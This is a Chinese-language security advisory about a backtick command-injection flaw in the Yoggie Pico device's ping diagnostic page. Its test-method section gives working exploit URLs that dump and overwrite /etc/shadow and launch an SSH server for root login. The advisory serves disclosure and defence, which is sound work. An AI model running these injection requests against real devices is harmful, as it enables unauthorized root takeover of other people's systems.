发布日期：2007-07-02
更新日期：2007-07-03

受影响系统：

Yoggie Pico
Yoggie Pico Pro

描述：

---

BUGTRAQ  ID: 24743

Yoggie Pico是一款小巧的USB设备，可实现防火墙和反病毒功能。

Yoggie Pico在处理用户提交的请求数据时存在漏洞，远程攻击者可能利用此漏洞在设备上执行任意命令。

Yoggie Pico安全设备的Web接口开放了ping功能以便于诊断。这个接口以ping -c 10 <given ip>的形式将输入的IP/主机名直接传送给了ping命令，并对“&”、“；”和管道执行了基本安全检查，但没有检查反引号（“`”），这允许攻击者通过提交特制的URL请求在设备上以root用户权限执行任意命令。

<*来源：Cody Brocious （cody.brocious@gmail.com）
  
  链接：http://marc.info/?l=full-disclosure&m=118337453500786&w=2
        http://secunia.com/advisories/25902/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

通过以下请求访问原始的/etc/shadow：
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60cp%20/etc/shadow%20shadow.txt%60 https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt

使用自己选择的口令替换root口令，然后用单引号引用文件并urlencode整个字符串。

使用自己的口令替换原始的/etc/shadow：
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60echo%20<urlencoded shadow file>%20%3E%20/etc/shadow%60

最后在7290端口上运行dropbear sshd：
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60/usr/sbin/dropbear%20-p%207290%60

这时便可以使用自己选择的口令以root权限登录，完全控制设备。

建议：

---

厂商补丁：

Yoggie
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.yoggie.com/node/41

浏览次数：2517
严重程度：0（网友投票）